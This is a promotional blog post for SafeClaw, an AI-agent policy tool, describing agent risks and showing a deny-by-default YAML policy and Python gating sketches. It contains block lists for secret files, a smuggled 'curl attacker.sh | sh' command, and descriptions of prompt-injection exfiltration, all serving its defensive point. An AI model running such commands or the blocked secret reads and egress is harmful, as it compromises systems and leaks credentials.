2025-12-15 · Authensor

Running AI Agents Without Safety Controls: What You Risk

Running an AI agent without safety controls is like giving a new employee admin access on day one with no oversight. SafeClaw by Authensor prevents this by enforcing deny-by-default policies on every action an agent attempts — file operations, shell commands, network calls, and code execution are all gated before they run. Without these controls, you are exposed to real, documented categories of harm.

The Five Risk Categories

1. File System Destruction

Agents with file access can overwrite, delete, or corrupt critical files. A coding agent asked to "clean up the repo" might delete your .env, wipe a dist/ folder that took hours to build, or overwrite a config file with hallucinated content.

2. Secret and Credential Leakage

Agents can read .env files, SSH keys, API tokens, and database credentials. If the agent has network access, those secrets can be sent to an external endpoint — intentionally via prompt injection, or accidentally by including them in a log or API call.
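Path-based gating is the standard defense here. As a minimal sketch (illustrative only, not SafeClaw's internal implementation, and the pattern list is assumed), a deny rule for secret files can be modeled as a filename check that runs before any read is allowed:

```python
from fnmatch import fnmatch
from pathlib import PurePosixPath

# Assumed deny patterns for secret-bearing files (illustrative, not exhaustive)
SECRET_NAME_PATTERNS = [".env", "*.pem", "*.key", "id_rsa"]

def read_is_blocked(path: str) -> bool:
    """Return True if the file's basename matches any secret pattern."""
    name = PurePosixPath(path).name
    return any(fnmatch(name, pattern) for pattern in SECRET_NAME_PATTERNS)
```

Matching on the basename means the rule holds no matter where the agent finds the file: `config/.env` is blocked just as `.env` at the repo root is.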

3. Cost Overruns

Agents with API access can make thousands of calls in seconds. Without budget controls, a coding agent could spin up cloud resources, trigger expensive API endpoints, or loop indefinitely — each iteration costing real money.
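A spend cap like the `maxCost`/`period` budget shown later in the policy can be reasoned about as a sliding window over recent costs. This is a hedged sketch of the idea, not SafeClaw's actual accounting:

```python
import time

class Budget:
    """Sliding-window spend limit, e.g. $5.00 per hour (illustrative only)."""

    def __init__(self, max_cost: float, period_s: float):
        self.max_cost = max_cost
        self.period_s = period_s
        self.spend = []  # list of (timestamp, cost) pairs

    def allow(self, cost: float, now: float = None) -> bool:
        """Record and allow the charge only if the window total stays under the cap."""
        now = time.monotonic() if now is None else now
        # Drop charges that have aged out of the window, then check the total.
        self.spend = [(t, c) for t, c in self.spend if now - t < self.period_s]
        if sum(c for _, c in self.spend) + cost > self.max_cost:
            return False
        self.spend.append((now, cost))
        return True
```

The key property: a looping agent hits the cap and stalls instead of silently accruing cost until someone reads the bill.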

4. Data Exfiltration

An agent with both file read and network access can exfiltrate proprietary code, user data, or internal documentation. Prompt injection attacks specifically target this pattern: read sensitive data, then POST it to an attacker-controlled endpoint.

5. System Compromise

Agents with shell access can install packages, modify system configs, open network ports, and create reverse shells. A single uncontrolled shell.execute call can compromise an entire system.
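The blunt but effective counter is an exact-match command allowlist. A minimal sketch, with an assumed command set (not SafeClaw's defaults):

```python
# Assumed allowlist of exact command strings (illustrative)
ALLOWED_COMMANDS = {"npm test", "npm run build"}

def shell_allowed(command: str) -> bool:
    """Exact-match only: no prefix matching, so shell metacharacters
    and injected arguments never slip through."""
    return command.strip() in ALLOWED_COMMANDS
```

Exact matching is deliberate: a prefix rule like "anything starting with `npm test`" would let `npm test; curl attacker.sh | sh` through.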

What SafeClaw Prevents

    # .safeclaw.yaml
    version: "1"
    defaultAction: deny

    rules:
      # Allow reading source files only
      - action: file.read
        path: "./src/**"
        decision: allow

      # Block reading secrets
      - action: file.read
        path: "**/.env"
        decision: deny
        reason: "Secret files are never accessible to agents"

      # Allow safe shell commands only
      - action: shell.execute
        command: "npm test"
        decision: allow

      # Block all network egress by default
      - action: network.request
        decision: deny
        reason: "Network access requires explicit approval"

      # Set budget limits
      - action: api.call
        budget:
          maxCost: 5.00
          period: "1h"
        decision: allow

Every action not explicitly allowed is denied. The agent cannot improvise its way around the policy.

Quick Start

Add SafeClaw to your project now:

npx @authensor/safeclaw

In 30 seconds, you go from zero protection to deny-by-default policy enforcement on every agent action.

The Cost of "We'll Add Safety Later"

Safety debt compounds faster than technical debt. Every unprotected agent run is an unaudited action. Every unaudited action is a potential incident. By the time you discover the agent leaked a secret or deleted a file, the damage is done and you have no audit trail to investigate.

FAQ

Q: My agent only reads files. Do I still need safety controls?
A: Yes. File reads can access secrets, credentials, and private data. SafeClaw lets you allow reads to specific paths while blocking everything else.

Q: I'm just prototyping. Can I add safety later?
A: SafeClaw installs in 30 seconds and starts with deny-by-default. Adding it at prototype stage costs nothing and prevents accidents from day one.

Q: What's the worst that has actually happened?
A: Documented incidents include agents deleting production databases, leaking API keys in logs, running up five-figure cloud bills, and exfiltrating source code via prompt injection. These are not hypothetical.

Try SafeClaw

Action-level gating for AI agents. Set it up in your browser in 60 seconds.

$ npx @authensor/safeclaw